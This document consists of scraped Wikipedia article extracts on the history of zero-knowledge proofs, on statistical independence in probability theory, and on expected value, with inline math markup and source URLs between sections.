in 1985 byShafi Goldwasser,Silvio Micali, andCharles Rackoffin their paper "The Knowledge Complexity of Interactive Proof-Systems".[16]This paper introduced the IP hierarchy of interactive proof systems (seeinteractive proof system) and conceived the concept ofknowledge complexity, a measurement of the amount of knowledge about the proof transferred from the prover to the verifier. They also gave the first zero-knowledge proof for a concrete problem, that of decidingquadratic nonresiduesmodm. Together with a paper byLászló BabaiandShlomo Moran, this landmark paper invented interactive proof systems, for which all five authors won the firstGödel Prizein 1993. In their own words, Goldwasser, Micali, and Rackoff say: Of particular interest is the case where this additional knowledge is essentially 0 and we show that [it] is possible to interactively prove that a number is quadratic non residue modmreleasing 0 additional knowledge. This is surprising as no efficient algorithm for deciding quadratic residuosity modmis known whenm’s factorization is not given. Moreover, all knownNPproofs for this problem exhibit the prime factorization ofm. This indicates that adding interaction to the proving process, may decrease the amount of knowledge that must be communicated in order to prove a theorem. The quadratic nonresidue problem has both anNPand aco-NPalgorithm, and so lies in the intersection of NP and co-NP. This was also true of several other problems for which zero-knowledge proofs were subsequently discovered, such as an unpublished proof system by Oded Goldreich verifying that a two-prime modulus is not aBlum integer.[29] Oded Goldreich,Silvio Micali, andAvi Wigdersontook this one step further, showing that, assuming the existence of unbreakable encryption, one can create a zero-knowledge proof system for the NP-completegraph coloring problemwith three colors. Since every problem in NP can be efficiently reduced to this problem, this means that, under this assumption, all problems in NP have zero-knowledge proofs.[30]The reason for the assumption is that, as in the above example, their protocols require encryption. A commonly cited sufficient condition for the existence of unbreakable encryption is the existence ofone-way functions, but it is conceivable that some physical means might also achieve it. On top of this, they also showed that thegraph nonisomorphism problem, thecomplementof thegraph isomorphism problem, has a zero-knowledge proof. This problem is in co-NP, but is not currently known to be in either NP or any practical class. More generally,Russell ImpagliazzoandMoti Yungas well as Ben-Or et al. would go on to show that, also assuming one-way functions or unbreakable encryption, there are zero-knowledge proofs forallproblems in IP = PSPACE, or in other words, anything that can be proved by an interactive proof system can be proved with zero knowledge.[31][32] Not liking to make unnecessary assumptions, many theorists sought a way to eliminate the necessity ofone way functions. One way this was done was withmulti-prover interactive proof systems(seeinteractive proof system), which have multiple independent provers instead of only one, allowing the verifier to "cross-examine" the provers in isolation to avoid being misled. It can be shown that, without any intractability assumptions, all languages in NP have zero-knowledge proofs in such a system.[33] It turns out that, in an Internet-like setting, where multiple protocols may be executed concurrently, building zero-knowledge proofs is more challenging. The line of research investigating concurrent zero-knowledge proofs was initiated by the work ofDwork,Naor, andSahai.[34]One particular development along these lines has been the development ofwitness-indistinguishable proofprotocols. The property of witness-indistinguishability is related to that of zero-knowledge, yet witness-indistinguishable protocols do not suffer from the same problems of concurrent execution.[35] Another variant of zero-knowledge proofs arenon-interactive zero-knowledge proofs. Blum, Feldman, and Micali showed that a common random string shared between the prover and the verifier is enough to achieve computational zero-knowledge without requiring interaction.[5][6] The most popular interactive ornon-interactive zero-knowledge proof(e.g., zk-SNARK) protocols can be broadly categorized in the following four categories: Succinct Non-Interactive ARguments of Knowledge (SNARK), Scalable Transparent ARgument of Knowledge (STARK), Verifiable Polynomial Delegation (VPD), and Succinct Non-interactive ARGuments (SNARG). A list of zero-knowledge proof protocols and libraries is provided below along with comparisons based ontransparency,universality,plausible post-quantum security, andprogramming paradigm.[36]A transparent protocol is one that does not require any trusted setup and uses public randomness. A universal protocol is one that does not require a separate trusted setup for each circuit. Finally, a plausibly post-quantum protocol is one that is not susceptible to known attacks involving quantum algorithms. While zero-knowledge proofs offer a secure way to verify information, the arithmetic circuits that implement them must be carefully designed. If these circuits lack sufficient constraints, they may introduce subtle yet critical security vulnerabilities. One of the most common classes of vulnerabilities in these systems is under-constrained logic, where insufficient constraints allow a malicious prover to produce a proof for an incorrect statement that still passes verification. A 2024 systematization of known attacks found that approximately 96% of documented circuit-layer bugs in SNARK-based systems were due to under-constrained circuits.[56] These vulnerabilities often arise during the translation of high-level logic into low-level constraint systems, particularly when using domain-specific languages such as Circom or Gnark. Recent research has demonstrated that formally proving determinism – ensuring that a circuit's outputs are uniquely determined by its inputs – can eliminate entire classes of these vulnerabilities.[57]
https://en.wikipedia.org/wiki/Zero-knowledge_proof
Independenceis a fundamental notion inprobability theory, as instatisticsand the theory ofstochastic processes. Twoeventsareindependent,statistically independent, orstochastically independent[1]if, informally speaking, the occurrence of one does not affect the probability of occurrence of the other or, equivalently, does not affect theodds. Similarly, tworandom variablesare independent if the realization of one does not affect theprobability distributionof the other. When dealing with collections of more than two events, two notions of independence need to be distinguished. The events are calledpairwise independentif any two events in the collection are independent of each other, whilemutual independence(orcollective independence) of events means, informally speaking, that each event is independent of any combination of other events in the collection. A similar notion exists for collections of random variables. Mutual independence implies pairwise independence, but not the other way around. In the standard literature of probability theory, statistics, and stochastic processes,independencewithout further qualification usually refers to mutual independence. Two eventsA{\displaystyle A}andB{\displaystyle B}are independent (often written asA⊥B{\displaystyle A\perp B}orA⊥⊥B{\displaystyle A\perp \!\!\!\perp B}, where the latter symbol often is also used forconditional independence) if and only if theirjoint probabilityequals the product of their probabilities:[2]: p. 29[3]: p. 10 A∩B≠∅{\displaystyle A\cap B\neq \emptyset }indicates that two independent eventsA{\displaystyle A}andB{\displaystyle B}have common elements in theirsample spaceso that they are notmutually exclusive(mutually exclusive iffA∩B=∅{\displaystyle A\cap B=\emptyset }). Why this defines independence is made clear by rewriting withconditional probabilitiesP(A∣B)=P(A∩B)P(B){\displaystyle P(A\mid B)={\frac {P(A\cap B)}{P(B)}}}as the probability at which the eventA{\displaystyle A}occurs provided that the eventB{\displaystyle B}has or is assumed to have occurred: and similarly Thus, the occurrence ofB{\displaystyle B}does not affect the probability ofA{\displaystyle A}, and vice versa. In other words,A{\displaystyle A}andB{\displaystyle B}are independent of each other. Although the derived expressions may seem more intuitive, they are not the preferred definition, as the conditional probabilities may be undefined ifP(A){\displaystyle \mathrm {P} (A)}orP(B){\displaystyle \mathrm {P} (B)}are 0. Furthermore, the preferred definition makes clear by symmetry that whenA{\displaystyle A}is independent ofB{\displaystyle B},B{\displaystyle B}is also independent ofA{\displaystyle A}. Stated in terms ofodds, two events are independent if and only if theodds ratioof⁠A{\displaystyle A}⁠and⁠B{\displaystyle B}⁠is unity (1). Analogously with probability, this is equivalent to the conditional odds being equal to the unconditional odds: or to the odds of one event, given the other event, being the same as the odds of the event, given the other event not occurring: The odds ratio can be defined as or symmetrically for odds of⁠B{\displaystyle B}⁠given⁠A{\displaystyle A}⁠, and thus is 1 if and only if the events are independent. A finite set of events{Ai}i=1n{\displaystyle \{A_{i}\}_{i=1}^{n}}ispairwise independentif every pair of events is independent[4]—that is, if and only if for all distinct pairs of indicesm,k{\displaystyle m,k}, A finite set of events ismutually independentif every event is independent of any intersection of the other events[4][3]: p. 11—that is, if and only if for everyk≤n{\displaystyle k\leq n}and for every k indices1≤i1<⋯<ik≤n{\displaystyle 1\leq i_{1}<\dots <i_{k}\leq n}, This is called themultiplication rulefor independent events. It isnot a single conditioninvolving only the product of all the probabilities of all single events; it must hold true for all subsets of events. For more than two events, a mutually independent set of events is (by definition) pairwise independent; but the converse isnot necessarily true.[2]: p. 30 Stated in terms oflog probability, two events are independent if and only if the log probability of the joint event is the sum of the log probability of the individual events: Ininformation theory, negative log probability is interpreted asinformation content, and thus two events are independent if and only if the information content of the combined event equals the sum of information content of the individual events: SeeInformation content § Additivity of independent eventsfor details. Two random variablesX{\displaystyle X}andY{\displaystyle Y}are independentif and only if(iff) the elements of theπ-systemgenerated by them are independent; that is to say, for everyx{\displaystyle x}andy{\displaystyle y}, the events{X≤x}{\displaystyle \{X\leq x\}}and{Y≤y}{\displaystyle \{Y\leq y\}}are independent events (as defined above inEq.1). That is,X{\displaystyle X}andY{\displaystyle Y}withcumulative distribution functionsFX(x){\displaystyle F_{X}(x)}andFY(y){\displaystyle F_{Y}(y)}, are independentiffthe combined random variable(X,Y){\displaystyle (X,Y)}has ajointcumulative distribution function[3]: p. 15 or equivalently, if theprobability densitiesfX(x){\displaystyle f_{X}(x)}andfY(y){\displaystyle f_{Y}(y)}and the joint probability densityfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}exist, A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}ispairwise independentif and only if every pair of random variables is independent. Even if the set of random variables is pairwise independent, it is not necessarilymutually independentas defined next. A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}ismutually independentif and only if for any sequence of numbers{x1,…,xn}{\displaystyle \{x_{1},\ldots ,x_{n}\}}, the events{X1≤x1},…,{Xn≤xn}{\displaystyle \{X_{1}\leq x_{1}\},\ldots ,\{X_{n}\leq x_{n}\}}are mutually independent events (as defined above inEq.3). This is equivalent to the following condition on the joint cumulative distribution functionFX1,…,Xn(x1,…,xn){\displaystyle F_{X_{1},\ldots ,X_{n}}(x_{1},\ldots ,x_{n})}.A finite set ofn{\displaystyle n}random variables{X1,…,Xn}{\displaystyle \{X_{1},\ldots ,X_{n}\}}is mutually independent if and only if[3]: p. 16 It is not necessary here to require that the probability distribution factorizes for all possiblek{\displaystyle k}-elementsubsets as in the case forn{\displaystyle n}events. This is not required because e.g.FX1,X2,X3(x1,x2,x3)=FX1(x1)⋅FX2(x2)⋅FX3(x3){\displaystyle F_{X_{1},X_{2},X_{3}}(x_{1},x_{2},x_{3})=F_{X_{1}}(x_{1})\cdot F_{X_{2}}(x_{2})\cdot F_{X_{3}}(x_{3})}impliesFX1,X3(x1,x3)=FX1(x1)⋅FX3(x3){\displaystyle F_{X_{1},X_{3}}(x_{1},x_{3})=F_{X_{1}}(x_{1})\cdot F_{X_{3}}(x_{3})}. The measure-theoretically inclined reader may prefer to substitute events{X∈A}{\displaystyle \{X\in A\}}for events{X≤x}{\displaystyle \{X\leq x\}}in the above definition, whereA{\displaystyle A}is anyBorel set. That definition is exactly equivalent to the one above when the values of the random variables arereal numbers. It has the advantage of working also for complex-valued random variables or for random variables taking values in anymeasurable space(which includestopological spacesendowed by appropriate σ-algebras). Two random vectorsX=(X1,…,Xm)T{\displaystyle \mathbf {X} =(X_{1},\ldots ,X_{m})^{\mathrm {T} }}andY=(Y1,…,Yn)T{\displaystyle \mathbf {Y} =(Y_{1},\ldots ,Y_{n})^{\mathrm {T} }}are called independent if[5]: p. 187 whereFX(x){\displaystyle F_{\mathbf {X} }(\mathbf {x} )}andFY(y){\displaystyle F_{\mathbf {Y} }(\mathbf {y} )}denote the cumulative distribution functions ofX{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }andFX,Y(x,y){\displaystyle F_{\mathbf {X,Y} }(\mathbf {x,y} )}denotes their joint cumulative distribution function. Independence ofX{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }is often denoted byX⊥⊥Y{\displaystyle \mathbf {X} \perp \!\!\!\perp \mathbf {Y} }. Written component-wise,X{\displaystyle \mathbf {X} }andY{\displaystyle \mathbf {Y} }are called independent if The definition of independence may be extended from random vectors to astochastic process. Therefore, it is required for an independent stochastic process that the random variables obtained by sampling the process at anyn{\displaystyle n}timest1,…,tn{\displaystyle t_{1},\ldots ,t_{n}}are independent random variables for anyn{\displaystyle n}.[6]: p. 163 Formally, a stochastic process{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}is called independent, if and only if for alln∈N{\displaystyle n\in \mathbb {N} }and for allt1,…,tn∈T{\displaystyle t_{1},\ldots ,t_{n}\in {\mathcal {T}}} whereFXt1,…,Xtn(x1,…,xn)=P(X(t1)≤x1,…,X(tn)≤xn){\displaystyle F_{X_{t_{1}},\ldots ,X_{t_{n}}}(x_{1},\ldots ,x_{n})=\mathrm {P} (X(t_{1})\leq x_{1},\ldots ,X(t_{n})\leq x_{n})}.Independence of a stochastic process is a propertywithina stochastic process, not between two stochastic processes. Independence of two stochastic processes is a property between two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}that are defined on the same probability space(Ω,F,P){\displaystyle (\Omega ,{\mathcal {F}},P)}. Formally, two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}are said to be independent if for alln∈N{\displaystyle n\in \mathbb {N} }and for allt1,…,tn∈T{\displaystyle t_{1},\ldots ,t_{n}\in {\mathcal {T}}}, the random vectors(X(t1),…,X(tn)){\displaystyle (X(t_{1}),\ldots ,X(t_{n}))}and(Y(t1),…,Y(tn)){\displaystyle (Y(t_{1}),\ldots ,Y(t_{n}))}are independent,[7]: p. 515i.e. if The definitions above (Eq.1andEq.2) are both generalized by the following definition of independence forσ-algebras. Let(Ω,Σ,P){\displaystyle (\Omega ,\Sigma ,\mathrm {P} )}be a probability space and letA{\displaystyle {\mathcal {A}}}andB{\displaystyle {\mathcal {B}}}be two sub-σ-algebras ofΣ{\displaystyle \Sigma }.A{\displaystyle {\mathcal {A}}}andB{\displaystyle {\mathcal {B}}}are said to be independent if, wheneverA∈A{\displaystyle A\in {\mathcal {A}}}andB∈B{\displaystyle B\in {\mathcal {B}}}, Likewise, a finite family of σ-algebras(τi)i∈I{\displaystyle (\tau _{i})_{i\in I}}, whereI{\displaystyle I}is anindex set, is said to be independent if and only if and an infinite family of σ-algebras is said to be independent if all its finite subfamilies are independent. The new definition relates to the previous ones very directly: Using this definition, it is easy to show that ifX{\displaystyle X}andY{\displaystyle Y}are random variables andY{\displaystyle Y}is constant, thenX{\displaystyle X}andY{\displaystyle Y}are independent, since the σ-algebra generated by a constant random variable is the trivial σ-algebra{∅,Ω}{\displaystyle \{\varnothing ,\Omega \}}. Probability zero events cannot affect independence so independence also holds ifY{\displaystyle Y}is only Pr-almost surelyconstant. Note that an event is independent of itself if and only if Thus an event is independent of itself if and only if italmost surelyoccurs or itscomplementalmost surely occurs; this fact is useful when provingzero–one laws.[8] IfX{\displaystyle X}andY{\displaystyle Y}are statistically independent random variables, then theexpectation operatorE{\displaystyle \operatorname {E} }has the property and thecovariancecov⁡[X,Y]{\displaystyle \operatorname {cov} [X,Y]}is zero, as follows from The converse does not hold: if two random variables have a covariance of 0 they still may be not independent. Similarly for two stochastic processes{Xt}t∈T{\displaystyle \left\{X_{t}\right\}_{t\in {\mathcal {T}}}}and{Yt}t∈T{\displaystyle \left\{Y_{t}\right\}_{t\in {\mathcal {T}}}}: If they are independent, then they areuncorrelated.[10]: p. 151 Two random variablesX{\displaystyle X}andY{\displaystyle Y}are independent if and only if thecharacteristic functionof the random vector(X,Y){\displaystyle (X,Y)}satisfies In particular the characteristic function of their sum is the product of their marginal characteristic functions: though the reverse implication is not true. Random variables that satisfy the latter condition are calledsubindependent. The event of getting a 6 the first time a die is rolled and the event of getting a 6 the second time areindependent. By contrast, the event of getting a 6 the first time a die is rolled and the event that the sum of the numbers seen on the first and second trial is 8 arenotindependent. If two cards are drawnwithreplacement from a deck of cards, the event of drawing a red card on the first trial and that of drawing a red card on the second trial areindependent. By contrast, if two cards are drawnwithoutreplacement from a deck of cards, the event of drawing a red card on the first trial and that of drawing a red card on the second trial arenotindependent, because a deck that has had a red card removed has proportionately fewer red cards. Consider the two probability spaces shown. In both cases,P(A)=P(B)=1/2{\displaystyle \mathrm {P} (A)=\mathrm {P} (B)=1/2}andP(C)=1/4{\displaystyle \mathrm {P} (C)=1/4}. The events in the first space are pairwise independent becauseP(A|B)=P(A|C)=1/2=P(A){\displaystyle \mathrm {P} (A|B)=\mathrm {P} (A|C)=1/2=\mathrm {P} (A)},P(B|A)=P(B|C)=1/2=P(B){\displaystyle \mathrm {P} (B|A)=\mathrm {P} (B|C)=1/2=\mathrm {P} (B)}, andP(C|A)=P(C|B)=1/4=P(C){\displaystyle \mathrm {P} (C|A)=\mathrm {P} (C|B)=1/4=\mathrm {P} (C)}; but the three events are not mutually independent. The events in the second space are both pairwise independent and mutually independent. To illustrate the difference, consider conditioning on two events. In the pairwise independent case, although any one event is independent of each of the other two individually, it is not independent of the intersection of the other two: In the mutually independent case, however, It is possible to create a three-event example in which and yet no two of the three events are pairwise independent (and hence the set of events are not mutually independent).[11]This example shows that mutual independence involves requirements on the products of probabilities of all combinations of events, not just the single events as in this example. The eventsA{\displaystyle A}andB{\displaystyle B}are conditionally independent given an eventC{\displaystyle C}when P(A∩B∣C)=P(A∣C)⋅P(B∣C){\displaystyle \mathrm {P} (A\cap B\mid C)=\mathrm {P} (A\mid C)\cdot \mathrm {P} (B\mid C)}. Intuitively, two random variablesX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}if, onceZ{\displaystyle Z}is known, the value ofY{\displaystyle Y}does not add any additional information aboutX{\displaystyle X}. For instance, two measurementsX{\displaystyle X}andY{\displaystyle Y}of the same underlying quantityZ{\displaystyle Z}are not independent, but they are conditionally independent givenZ{\displaystyle Z}(unless the errors in the two measurements are somehow connected). The formal definition of conditional independence is based on the idea ofconditional distributions. IfX{\displaystyle X},Y{\displaystyle Y}, andZ{\displaystyle Z}arediscrete random variables, then we defineX{\displaystyle X}andY{\displaystyle Y}to be conditionally independent givenZ{\displaystyle Z}if for allx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}such thatP(Z=z)>0{\displaystyle \mathrm {P} (Z=z)>0}. On the other hand, if the random variables arecontinuousand have a jointprobability density functionfXYZ(x,y,z){\displaystyle f_{XYZ}(x,y,z)}, thenX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}if for all real numbersx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}such thatfZ(z)>0{\displaystyle f_{Z}(z)>0}. If discreteX{\displaystyle X}andY{\displaystyle Y}are conditionally independent givenZ{\displaystyle Z}, then for anyx{\displaystyle x},y{\displaystyle y}andz{\displaystyle z}withP(Z=z)>0{\displaystyle \mathrm {P} (Z=z)>0}. That is, the conditional distribution forX{\displaystyle X}givenY{\displaystyle Y}andZ{\displaystyle Z}is the same as that givenZ{\displaystyle Z}alone. A similar equation holds for the conditional probability density functions in the continuous case. Independence can be seen as a special kind of conditional independence, since probability can be seen as a kind of conditional probability given no events. Before 1933, independence, in probability theory, was defined in a verbal manner. For example,de Moivregave the following definition: “Two events are independent, when they have no connexion one with the other, and that the happening of one neither forwards nor obstructs the happening of the other”.[12]If there are n independent events, the probability of the event, that all of them happen was computed as the product of the probabilities of these n events. Apparently, there was the conviction, that this formula was a consequence of the above definition. (Sometimes this was called the Multiplication Theorem.), Of course, a proof of his assertion cannot work without further more formal tacit assumptions. The definition of independence, given in this article, became the standard definition (now used in all books) after it appeared in 1933 as part of Kolmogorov's axiomatization of probability.[13]Kolmogorovcredited it toS.N. Bernstein, and quoted a publication which had appeared in Russian in 1927.[14] Unfortunately, both Bernstein and Kolmogorov had not been aware of the work of theGeorg Bohlmann. Bohlmann had given the same definition for two events in 1901[15]and for n events in 1908[16]In the latter paper, he studied his notion in detail. For example, he gave the first example showing that pairwise independence does not imply mutual independence. Even today, Bohlmann is rarely quoted. More about his work can be found inOn the contributions of Georg Bohlmann to probability theoryfromde:Ulrich Krengel.[17]
https://en.wikipedia.org/wiki/Independence_(probability_theory)
Inprobability theory, theexpected value(also calledexpectation,expectancy,expectation operator,mathematical expectation,mean,expectation value, orfirstmoment) is a generalization of theweighted average. Informally, the expected value is themeanof the possible values arandom variablecan take, weighted by the probability of those outcomes. Since it is obtained through arithmetic, the expected value sometimes may not even be included in the sample data set; it is not the value you would expect to get in reality. The expected value of a random variable with a finite number of outcomes is a weighted average of all possible outcomes. In the case of a continuum of possible outcomes, the expectation is defined byintegration. In the axiomatic foundation for probability provided bymeasure theory, the expectation is given byLebesgue integration. The expected value of a random variableXis often denoted byE(X),E[X], orEX, withEalso often stylized asE{\displaystyle \mathbb {E} }orE.[1][2][3] The idea of the expected value originated in the middle of the 17th century from the study of the so-calledproblem of points, which seeks to divide the stakesin a fair waybetween two players, who have to end their game before it is properly finished.[4]This problem had been debated for centuries. Many conflicting proposals and solutions had been suggested over the years when it was posed toBlaise Pascalby French writer and amateur mathematicianChevalier de Méréin 1654. Méré claimed that this problem could not be solved and that it showed just how flawed mathematics was when it came to its application to the real world. Pascal, being a mathematician, was provoked and determined to solve the problem once and for all. He began to discuss the problem in the famous series of letters toPierre de Fermat. Soon enough, they both independently came up with a solution. They solved the problem in different computational ways, but their results were identical because their computations were based on the same fundamental principle. The principle is that the value of a future gain should be directly proportional to the chance of getting it. This principle seemed to have come naturally to both of them. They were very pleased by the fact that they had found essentially the same solution, and this in turn made them absolutely convinced that they had solved the problem conclusively; however, they did not publish their findings. They only informed a small circle of mutual scientific friends in Paris about it.[5] In Dutch mathematicianChristiaan Huygens'book, he considered the problem of points, and presented a solution based on the same principle as the solutions of Pascal and Fermat. Huygens published his treatise in 1657, (seeHuygens (1657)) "De ratiociniis in ludo aleæ" on probability theory just after visiting Paris. The book extended the concept of expectation by adding rules for how to calculate expectations in more complicated situations than the original problem (e.g., for three or more players), and can be seen as the first successful attempt at laying down the foundations of thetheory of probability. In the foreword to his treatise, Huygens wrote: It should be said, also, that for some time some of the best mathematicians of France have occupied themselves with this kind of calculus so that no one should attribute to me the honour of the first invention. This does not belong to me. But these savants, although they put each other to the test by proposing to each other many questions difficult to solve, have hidden their methods. I have had therefore to examine and go deeply for myself into this matter by beginning with the elements, and it is impossible for me for this reason to affirm that I have even started from the same principle. But finally I have found that my answers in many cases do not differ from theirs. In the mid-nineteenth century,Pafnuty Chebyshevbecame the first person to think systematically in terms of the expectations ofrandom variables.[6] Neither Pascal nor Huygens used the term "expectation" in its modern sense. In particular, Huygens writes:[7] That any one Chance or Expectation to win any thing is worth just such a Sum, as wou'd procure in the same Chance and Expectation at a fair Lay. ... If I expect a or b, and have an equal chance of gaining them, my Expectation is worth (a+b)/2. More than a hundred years later, in 1814,Pierre-Simon Laplacepublished his tract "Théorie analytique des probabilités", where the concept of expected value was defined explicitly:[8] ... this advantage in the theory of chance is the product of the sum hoped for by the probability of obtaining it; it is the partial sum which ought to result when we do not wish to run the risks of the event in supposing that the division is made proportional to the probabilities. This division is the only equitable one when all strange circumstances are eliminated; because an equal degree of probability gives an equal right for the sum hoped for. We will call this advantagemathematical hope. The use of the letterEto denote "expected value" goes back toW. A. Whitworthin 1901.[9]The symbol has since become popular for English writers. In German,Estands forErwartungswert, in Spanish foresperanza matemática, and in French forespérance mathématique.[10] When "E" is used to denote "expected value", authors use a variety of stylizations: the expectation operator can be stylized asE(upright),E(italic), orE{\displaystyle \mathbb {E} }(inblackboard bold), while a variety of bracket notations (such asE(X),E[X], andEX) are all used. Another popular notation isμX.⟨X⟩,⟨X⟩av, andX¯{\displaystyle {\overline {X}}}are commonly used in physics.[11]M(X)is used in Russian-language literature. As discussed above, there are several context-dependent ways of defining the expected value. The simplest and original definition deals with the case of finitely many possible outcomes, such as in the flip of a coin. With the theory of infinite series, this can be extended to the case of countably many possible outcomes. It is also very common to consider the distinct case of random variables dictated by (piecewise-)continuousprobability density functions, as these arise in many natural contexts. All of these specific definitions may be viewed as special cases of the general definition based upon the mathematical tools ofmeasure theoryandLebesgue integration, which provide these different contexts with an axiomatic foundation and common language. Any definition of expected value may be extended to define an expected value of a multidimensional random variable, i.e. arandom vectorX. It is defined component by component, asE[X]i= E[Xi]. Similarly, one may define the expected value of arandom matrixXwith componentsXijbyE[X]ij= E[Xij]. Consider a random variableXwith afinitelistx1, ...,xkof possible outcomes, each of which (respectively) has probabilityp1, ...,pkof occurring. The expectation ofXis defined as[12]E⁡[X]=x1p1+x2p2+⋯+xkpk.{\displaystyle \operatorname {E} [X]=x_{1}p_{1}+x_{2}p_{2}+\cdots +x_{k}p_{k}.} Since the probabilities must satisfyp1+ ⋅⋅⋅ +pk= 1, it is natural to interpretE[X]as aweighted averageof thexivalues, with weights given by their probabilitiespi. In the special case that all possible outcomes areequiprobable(that is,p1= ⋅⋅⋅ =pk), the weighted average is given by the standardaverage. In the general case, the expected value takes into account the fact that some outcomes are more likely than others. Informally, the expectation of a random variable with acountably infinite setof possible outcomes is defined analogously as the weighted average of all possible outcomes, where the weights are given by the probabilities of realizing each given value. This is to say thatE⁡[X]=∑i=1∞xipi,{\displaystyle \operatorname {E} [X]=\sum _{i=1}^{\infty }x_{i}\,p_{i},}wherex1,x2, ...are the possible outcomes of the random variableXandp1,p2, ...are their corresponding probabilities. In many non-mathematical textbooks, this is presented as the full definition of expected values in this context.[13] However, there are some subtleties with infinite summation, so the above formula is not suitable as a mathematical definition. In particular, theRiemann series theoremofmathematical analysisillustrates that the value of certain infinite sums involving positive and negative summands depends on the order in which the summands are given. Since the outcomes of a random variable have no naturally given order, this creates a difficulty in defining expected value precisely. For this reason, many mathematical textbooks only consider the case that the infinite sum given aboveconverges absolutely, which implies that the infinite sum is a finite number independent of the ordering of summands.[14]In the alternative case that the infinite sum does not converge absolutely, one says the random variabledoes not have finite expectation.[14] Now consider a random variableXwhich has aprobability density functiongiven by a functionfon thereal number line. This means that the probability ofXtaking on a value in any givenopen intervalis given by theintegraloffover that interval. The expectation ofXis then given by the integral[15]E⁡[X]=∫−∞∞xf(x)dx.{\displaystyle \operatorname {E} [X]=\int _{-\infty }^{\infty }xf(x)\,dx.}A general and mathematically precise formulation of this definition usesmeasure theoryandLebesgue integration, and the corresponding theory ofabsolutely continuous random variablesis described in the next section. The density functions of many common distributions arepiecewise continuous, and as such the theory is often developed in this restricted setting.[16]For such functions, it is sufficient to only consider the standardRiemann integration. Sometimescontinuous random variablesare defined as those corresponding to this special class of densities, although the term is used differently by various authors. Analogously to the countably-infinite case above, there are subtleties with this expression due to the infinite region of integration. Such subtleties can be seen concretely if the distribution ofXis given by theCauchy distributionCauchy(0, π), so thatf(x) = (x2+ π2)−1. It is straightforward to compute in this case that∫abxf(x)dx=∫abxx2+π2dx=12ln⁡b2+π2a2+π2.{\displaystyle \int _{a}^{b}xf(x)\,dx=\int _{a}^{b}{\frac {x}{x^{2}+\pi ^{2}}}\,dx={\frac {1}{2}}\ln {\frac {b^{2}+\pi ^{2}}{a^{2}+\pi ^{2}}}.}The limit of this expression asa→ −∞andb→ ∞does not exist: if the limits are taken so thata= −b, then the limit is zero, while if the constraint2a= −bis taken, then the limit isln(2). To avoid such ambiguities, in mathematical textbooks it is common to require that the given integralconverges absolutely, withE[X]left undefined otherwise.[17]However, measure-theoretic notions as given below can be used to give a systematic definition ofE[X]for more general random variablesX. All definitions of the expected value may be expressed in the language ofmeasure theory. In general, ifXis a real-valuedrandom variabledefined on aprobability space(Ω, Σ, P), then the expected value ofX, denoted byE[X], is defined as theLebesgue integral[18]E⁡[X]=∫ΩXdP.{\displaystyle \operatorname {E} [X]=\int _{\Omega }X\,d\operatorname {P} .}Despite the newly abstract situation, this definition is extremely similar in nature to the very simplest definition of expected values, given above, as certain weighted averages. This is because, in measure theory, the value of the Lebesgue integral ofXis defined via weighted averages ofapproximationsofXwhich take on finitely many values.[19]Moreover, if given a random variable with finitely or countably many possible values, the Lebesgue theory of expectation is identical to the summation formulas given above. However, the Lebesgue theory clarifies the scope of the theory of probability density functions. A random variableXis said to beabsolutely continuousif any of the following conditions are satisfied: These conditions are all equivalent, although this is nontrivial to establish.[20]In this definition,fis called theprobability density functionofX(relative to Lebesgue measure). According to the change-of-variables formula for Lebesgue integration,[21]combined with thelaw of the unconscious statistician,[22]it follows thatE⁡[X]≡∫ΩXdP=∫Rxf(x)dx{\displaystyle \operatorname {E} [X]\equiv \int _{\Omega }X\,d\operatorname {P} =\int _{\mathbb {R} }xf(x)\,dx}for any absolutely continuous random variableX. The above discussion of continuous random variables is thus a special case of the general Lebesgue theory, due to the fact that every piecewise-continuous function is measurable. The expected value of any real-valued random variableX{\displaystyle X}can also be defined on the graph of itscumulative distribution functionF{\displaystyle F}by a nearby equality of areas. In fact,E⁡[X]=μ{\displaystyle \operatorname {E} [X]=\mu }with a real numberμ{\displaystyle \mu }if and only if the two surfaces in thex{\displaystyle x}-y{\displaystyle y}-plane, described byx≤μ,0≤y≤F(x)orx≥μ,F(x)≤y≤1{\displaystyle x\leq \mu ,\;\,0\leq y\leq F(x)\quad {\text{or}}\quad x\geq \mu ,\;\,F(x)\leq y\leq 1}respectively, have the same finite area, i.e. if∫−∞μF(x)dx=∫μ∞(1−F(x))dx{\displaystyle \int _{-\infty }^{\mu }F(x)\,dx=\int _{\mu }^{\infty }{\big (}1-F(x){\big )}\,dx}and bothimproper Riemann integralsconverge. Finally, this is equivalent to the representationE⁡[X]=∫0∞(1−F(x))dx−∫−∞0F(x)dx,{\displaystyle \operatorname {E} [X]=\int _{0}^{\infty }{\bigl (}1-F(x){\bigr )}\,dx-\int _{-\infty }^{0}F(x)\,dx,}also with convergent integrals.[23] Expected values as defined above are automatically finite numbers. However, in many cases it is fundamental to be able to consider expected values of±∞. This is intuitive, for example, in the case of theSt. Petersburg paradox, in which one considers a random variable with possible outcomesxi= 2i, with associated probabilitiespi= 2−i, foriranging over all positive integers. According to the summation formula in the case of random variables with countably many outcomes, one hasE⁡[X]=∑i=1∞xipi=2⋅12+4⋅14+8⋅18+16⋅116+⋯=1+1+1+1+⋯.{\displaystyle \operatorname {E} [X]=\sum _{i=1}^{\infty }x_{i}\,p_{i}=2\cdot {\frac {1}{2}}+4\cdot {\frac {1}{4}}+8\cdot {\frac {1}{8}}+16\cdot {\frac {1}{16}}+\cdots =1+1+1+1+\cdots .}It is natural to say that the expected value equals+∞. There is a rigorous mathematical theory underlying such ideas, which is often taken as part of the definition of the Lebesgue integral.[19]The first fundamental observation is that, whichever of the above definitions 